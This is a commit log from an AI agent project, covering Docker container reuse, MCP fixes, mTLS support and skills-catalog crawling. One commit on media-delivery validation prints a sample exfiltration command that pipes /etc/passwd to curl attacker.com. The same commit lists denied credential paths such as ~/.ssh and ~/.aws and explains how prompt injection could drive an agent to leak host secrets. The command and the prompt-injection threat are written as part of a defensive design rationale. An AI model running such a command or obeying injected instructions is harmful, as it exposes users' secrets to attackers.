Ben	ac8e238bc8	fix(docker): reuse containers across processes + fix cleanup leaks The Docker backend docs claim "Single persistent container — ONE long- lived container shared across sessions, /new, /reset, and delegate_task subagents. Stopped/removed on shutdown." In practice the code only honored that contract within a single Python process via the in-memory \`_active_environments[task_id]\` cache. Every \`hermes chat\` invocation spawned a fresh \`hermes-<hex>\` container; older containers piled up in \`Exited\` state and accumulated until manual \`docker rm\` (issue #20561). Three root causes, all addressed by this commit: 1. No cross-process container discovery. 2. \`cleanup()\` used fire-and-forget \`subprocess.Popen("... &", shell=True)\` which raced with parent-process exit — when Python exited promptly the detached shell child got killed mid-\`docker stop\`, leaving stopped containers behind. 3. The \`docker rm\` step in cleanup was gated on \`not self._persistent\` (the bind-mount-persistence flag). Default config sets \`container_persistent: true\`, so the default happy path skipped \`rm\` entirely — even when the user explicitly didn't want cross-process reuse, containers leaked. Fix: * Add \`DockerEnvironment.__init__(persist_across_processes=True)\`. When true, init probes \`docker ps -a --filter label=hermes-agent=1 --filter label=hermes-task-id=<task> --filter label=hermes-profile=<profile>\` and reuses a matching container (running → attach; stopped → \`docker start\` → attach; \`docker start\` failure → fall through to a fresh \`docker run\`). Multiple matches prefer the running one, with the stragglers left for the orphan reaper (next commit) to clean up. * Rewrite \`cleanup()\`. Uses \`subprocess.run(..., timeout=30)\` on a daemon \`threading.Thread\`, not the racy \`Popen(... &)\`. The \`_persistent\` guard is dropped on the \`rm\` step — \`rm\` now runs whenever \`persist_across_processes\` is false, regardless of the bind-mount-persistence setting. The leak class is gone in all combinations. * Add \`wait_for_cleanup(timeout)\`. \`tools/terminal_tool.py\`'s atexit hook calls this on every active env, blocking up to 15s for the cleanup thread before interpreter exit. Without this, \`hermes /quit\` raced the daemon-thread teardown and dropped the stop/rm work. * New config \`terminal.docker_persist_across_processes\` (default \`true\` — restores the documented contract). Set \`false\` for hard per-process isolation. Wired through all four config-bridge sites (cli.py env_mappings, gateway/run.py _terminal_env_map, hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip list); regression-pinned by \`test_docker_persist_across_processes_is_bridged_everywhere\` matching the existing pattern for docker_run_as_host_user / docker_env. Reuse intentionally does NOT compare image / mounts / resources — only the labels. Operators changing those settings should set \`docker_persist_across_processes: false\` (or \`docker rm -f\` the labeled container) to force a fresh start. This keeps the probe cheap and the failure mode obvious. Coverage: 12 new unit tests in tests/tools/test_docker_environment.py covering reuse paths (running, stopped, fallback, opt-out, duplicate preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm, no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one config-bridge regression pin. Refs #20561	2026-05-29 11:49:54 +10:00
Ben	8d129d013b	fix(docker): tag containers with hermes-agent labels for identification Issue #20561 (Docker containers accumulate) needs a way to identify hermes-created containers from the outside — both for the orphan reaper (a follow-up commit) and for operators triaging `docker ps -a \| grep hermes-` after a SIGKILL leaves stragglers. The previous `hermes-<hex>` name prefix was the only signal, which broke down under cross-process reuse (planned) and against any custom `--name` someone might pass via `docker_extra_args`. This commit adds three labels at `docker run` time: --label hermes-agent=1 # global sweep target --label hermes-task-id=<sanitized> # per-task reuse key --label hermes-profile=<sanitized> # per-profile isolation key Values are sanitized to `[A-Za-z0-9_.-]` and truncated to 63 chars so the label round-trips cleanly through `docker ps --filter label=key=value`. Empty or non-string inputs collapse to "unknown" rather than producing an unqueryable empty value. No behavior change: the labels are pure metadata. The follow-up commits in this PR (cleanup-fix + orphan reaper) are what use them. Refs #20561	2026-05-29 11:49:54 +10:00
Ben	e7c99651fb	fix(mcp): resolve bare npx/npm/node against /usr/local/bin When the Hermes Docker image runs an stdio MCP server configured with an explicit env.PATH that omits /usr/local/bin (a common pattern when users hand-author PATH for sandboxing), the MCP env-filter passes that narrow PATH straight through to the subprocess. _resolve_stdio_command's fallback for bare 'npx' / 'npm' / 'node' commands only checked $HERMES_HOME/node/bin/ and ~/.local/bin/, so execvp() failed with '[Errno 2] No such file or directory: npx' on every Node-based stdio MCP server (Railway, Anthropic, GitHub Copilot, etc.). The naive workaround — symlink /usr/local/bin/npx into the user's PATH — fails one layer deeper because npx's shebang re-execs /usr/bin/env node and node also lives at /usr/local/bin/node. Fix: add /usr/local/bin/<cmd> as a third candidate in the fallback list. This is the canonical install location for Node on: - Linux from-source builds - the upstream node:bookworm-slim image, which the Hermes Docker image copies node + npm + corepack from since #4977 (the Node 22 LTS refactor that exposed this) - macOS Homebrew on Intel Because the resolver already calls _prepend_path(resolved_env, command_dir) after locating the command, /usr/local/bin gets prepended to the env's PATH automatically, which also fixes the second-layer shebang failure (npx-cli.js can now find node). Scope is intentionally narrow: the fix activates only when the bare command isn't otherwise locatable through the user's PATH. Users who explicitly narrowed PATH for a non-Node MCP server see no change in behavior. Tested: - tests/tools/test_mcp_tool_issue_948.py: new test test_resolve_stdio_command_falls_back_to_usr_local_bin (mirrors the existing hermes-node-bin fallback test) - Full MCP test suite: 254/254 pass across 7 test files - E2E against a freshly-built Docker image: reproduced the original failure mode (env.PATH=/opt/data/bin:/usr/bin:/bin), confirmed the resolver returns /usr/local/bin/npx and prepends /usr/local/bin to PATH; subprocess.run of the resolved command prints '10.9.8' and exits 0 with empty stderr - Negative E2E on the host (where Node is already on PATH via mise): resolver still hits the mise install dir, /usr/local/bin candidate is not consulted, PATH is unchanged	2026-05-29 10:05:42 +10:00
Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
Teknium	7050c052e3	fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025 ) The skills.sh source was returning ~858 unique skills from a hardcoded list of 28 popular keyword searches (each capped at 50 results). The real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from the site's sitemap index. Switch the empty-query path in SkillsShSource.search() to walk the sitemap instead of scraping the homepage's curated featured strip. Falls back to the homepage scrape if the sitemap is unreachable. build_skills_index.crawl_skills_sh() now just calls search("", limit=0) instead of running 28 keyword searches — same result in one HTTP round instead of 28. Also handle a httpx + brotlicffi interaction: the per-skill sitemaps are ~900 KB brotli-compressed and the cffi backend's streaming decode chokes on them. Forcing Accept-Encoding to gzip dodges the bug without requiring a brotli library upgrade. E2E against live skills.sh: 19,932 unique skills walked in 0.7s. Tests: 137 pass (+1 new regression test exercising the sitemap path). Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future regression hard-fails the build.	2026-05-28 11:28:12 -07:00
Teknium	5e1f793430	chore(web): remove web_crawl tool + provider crawl plumbing (#33824 ) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608.	2026-05-28 04:52:42 -07:00
teknium1	78be458608	fix(patch): widen new_string \t/\r unescape to all match strategies (#33733 ) Extends @liuhao1024's escape-normalized fix so the patch tool also recovers when old_string carries a real tab byte and matches via the `exact` strategy — which is the headline reproduction in the issue and the most common case in practice (LLMs frequently get old_string right because they re-read the file, but still serialize new_string's tabs as two-character `\t`). Instead of gating on the match strategy, decide per-sequence by looking at the matched region of the file: only convert `\t` -> tab and `\r` -> CR when the file region we're replacing actually contains the corresponding control byte. That mirrors the region-based heuristic in `_detect_escape_drift` and keeps legitimate writes of the literal two-character string `"\t"` (e.g. patching `sep = "\t"` in Python source) untouched — those files have a backslash+t in the matched region, not a real tab, so new_string passes through verbatim. `\n` is still excluded because newlines serialize correctly through JSON and unescaping would corrupt source escape sequences far more often than help. E2E verified against the live `patch` tool: tab-indented file + literal `\t` in new_string under both `exact` (Variant 1) and `escape_normalized` (Variant 2) strategies now produces real tab bytes; a Python source line containing `sep = "\t"` (legitimate literal backslash-t) survives a patch unchanged. Tests updated to cover both strategies and the legitimate-literal case, and to assert that `\n` is intentionally preserved. Refs #33733	2026-05-28 03:27:20 -07:00
liuhao1024	e9f3f2b34a	fix(tools): unescape common sequences in new_string when escape_normalized matches When the patch tool matches via the escape_normalized strategy, old_string contains literal \t, \n, \r sequences that get unescaped to match real control characters in the file. However, new_string was written as-is, leaving literal backslash sequences in the output. Add _unescape_common_sequences() helper and apply it to new_string when the matching strategy is escape_normalized. This ensures LLM-generated tab/newline sequences become real bytes in the patched file. Fixes #33733	2026-05-28 03:27:20 -07:00
Dusk1e	a91b1c8b31	fix(tirith): reject non-regular tar members during auto-install process	2026-05-28 02:49:26 -07:00
Teknium	fb9f3a4ef9	fix(skills): pull full ClawHub catalog into the skills index (200 → 20k+) (#33748 ) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000	2026-05-28 01:42:19 -07:00
Teknium	87e5b2fae0	feat(mcp): support TLS client certificates (mTLS) for HTTP and SSE servers (#33721 ) Adds first-class `client_cert` / `client_key` config keys so MCP servers behind mTLS work without an external TLS-terminating proxy. Resolves inbound community question (Jeremy W.). Schema (per `mcp_servers.<name>`, HTTP/SSE only): - `client_cert: "/path/to/combined.pem"` — single PEM with cert + key - `client_cert: "/path/to/cert"` + `client_key: "/path/to/key"` — separate - `client_cert: [cert, key]` or `[cert, key, password]` — list form, with optional passphrase for encrypted keys Paths support `~` expansion. Missing files raise a server-scoped `FileNotFoundError` at connect time rather than failing later with an opaque TLS handshake error. Wiring: - New SDK HTTP path (mcp >= 1.24): `cert=` on the user-owned `httpx.AsyncClient` alongside the existing `verify=` handling. - SSE path: routed through an `httpx_client_factory` that wraps the SDK's defaults (follow_redirects=True) and layers `verify` + `cert` on top. The factory is only injected when needed, so the SDK's built-in `create_mcp_http_client` keeps being used in the default case. - Deprecated mcp<1.24 path left untouched — that SDK's `streamablehttp_client` signature doesn't expose `cert`, and adding it would be dead code. Also documents the previously-undocumented `ssl_verify` key (bool or CA bundle path) in the MCP config reference. Tests: - `tests/tools/test_mcp_client_cert.py` (new, 19 tests): - `_resolve_client_cert` helper: all three input forms, `~` expansion, missing-file and validation errors. - HTTP transport: `cert=` forwarded into `httpx.AsyncClient` for string and tuple forms; absent when unset; missing-file error propagates. - SSE transport: factory only injected when cert or non-default verify is set; factory applies cert, custom CA bundle, and preserves `follow_redirects=True` + forwarded headers/auth. - Existing tests: 200/200 in `test_mcp_tool.py` + `test_mcp_sse_transport.py` still pass.	2026-05-28 00:55:55 -07:00
Robin Fernandes	dc52b82d53	test(auth): update entitlement CI expectations	2026-05-28 00:19:31 -07:00
Robin Fernandes	1cf5e639b3	fix(auth): refresh Nous entitlement in tool menus	2026-05-28 00:19:31 -07:00
Robin Fernandes	406901b27d	feat(auth) normalise the way in which we check whether a user has free/paid access to nous portal so we can expose behaviour and error messages accordingly.	2026-05-28 00:19:31 -07:00
Teknium	4e702fe2d9	test(ci): harden two flaky tests against CI noise (#33675 ) Some checks are pending Deploy Site / deploy-vercel (push) Waiting to run Details Deploy Site / deploy-docs (push) Waiting to run Details Docker / shell lint / Lint Dockerfile (hadolint) (push) Waiting to run Details Docker / shell lint / Lint docker/ shell scripts (shellcheck) (push) Waiting to run Details Docker Build and Publish / build-amd64 (push) Waiting to run Details Docker Build and Publish / build-arm64 (push) Waiting to run Details Docker Build and Publish / merge (push) Blocked by required conditions Details Lint (ruff + ty) / ruff + ty diff (push) Waiting to run Details Lint (ruff + ty) / ruff enforcement (blocking) (push) Waiting to run Details Lint (ruff + ty) / Windows footguns (blocking) (push) Waiting to run Details Nix / nix (macos-latest) (push) Waiting to run Details Nix / nix (ubuntu-latest) (push) Waiting to run Details OSV-Scanner / Scan lockfiles (push) Waiting to run Details Tests / test (1) (push) Waiting to run Details Tests / test (2) (push) Waiting to run Details Tests / test (3) (push) Waiting to run Details Tests / test (4) (push) Waiting to run Details Tests / test (5) (push) Waiting to run Details Tests / test (6) (push) Waiting to run Details Tests / save-durations (push) Blocked by required conditions Details Tests / e2e (push) Waiting to run Details uv.lock check / uv lock --check (push) Waiting to run Details Two unrelated transient failures on PR #33661's initial CI run, both pre-existing on main and recovered on rerun. Hardening: 1. tests/cron/test_scheduler.py::TestRunJobConfigLogging — added mocks for resolve_runtime_provider() and discover_mcp_tools(). The yaml-warning tests intend to exercise only the warning-log path, but _run_job_impl continues into provider resolution and MCP discovery after the warning. Both can spawn subprocesses / hit the network and pushed the test over its 30s budget under GHA load. 2. tests/tools/test_browser_supervisor.py — wrapped Chrome teardown against the stdlib subprocess._wait() race (bpo-38630). When SIGCHLD arrives during proc.wait(), _try_wait(WNOHANG) can return a foreign pid and the 'assert pid == self.pid or pid == 0' fires. Fixture now catches AssertionError/TimeoutExpired, force-kills, and always reaps so no zombie escapes. Same hardening applied to the early-skip branch.	2026-05-27 23:15:41 -07:00
Brooklyn Nicholson	02d26981d3	Merge origin/main into bb/gui	2026-05-27 21:22:14 -05:00
teknium1	36c99af37a	test(kanban): align two tests with recent kanban hardening Two pre-existing test failures on main, both pointing at code that was hardened recently — not behaviour bugs, test expectations that fell out of date. 1. tests/tools/test_kanban_tools.py::test_worker_complete_rejects_stale_run_id `c002668ff` ("fix(kanban): add grace period to detect_crashed_workers") gates each running task behind a launch-window grace period so freshly-spawned workers whose PID isn't yet visible on /proc don't get reclaimed. The test creates a worker_env fixture moments before asserting reclamation, so the default 30s grace skips the liveness check and detect_crashed_workers returns []. Fix: set HERMES_KANBAN_CRASH_GRACE_SECONDS=0 in the test so we get the immediate-reclaim semantics the assertion expects. 2. tests/tools/test_windows_native_support.py:: TestKanbanWaitpidWindowsGuard::test_source_gates_waitpid_loop `ffdc937c1` ("fix(kanban): hoist zombie reaper out of dispatch_once") reshaped reap_worker_zombies to use an early-return Windows guard (\`if os.name == "nt": return []\`) instead of an inverted gate (\`if os.name != "nt":\`). Both correctly keep the waitpid loop off Windows — the early-return form is stronger because the rest of the function never runs. Fix: accept either gate pattern in the source scan. Both failures reproduce verbatim on \`origin/main\` in a clean env; neither relates to in-flight work on #33564 (the FD-leak fix). Filing this as a separate fix-it PR per green-CI-policy so the kanban CI shard stays green for downstream PRs.	2026-05-27 18:26:44 -07:00
wysie	f040710d04	fix: backfill official optional skill provenance	2026-05-27 13:39:58 -07:00
wysie	a38e283395	fix: preserve nested official skill install paths	2026-05-27 13:39:58 -07:00

1 2 3 4 5 ...

1021 commits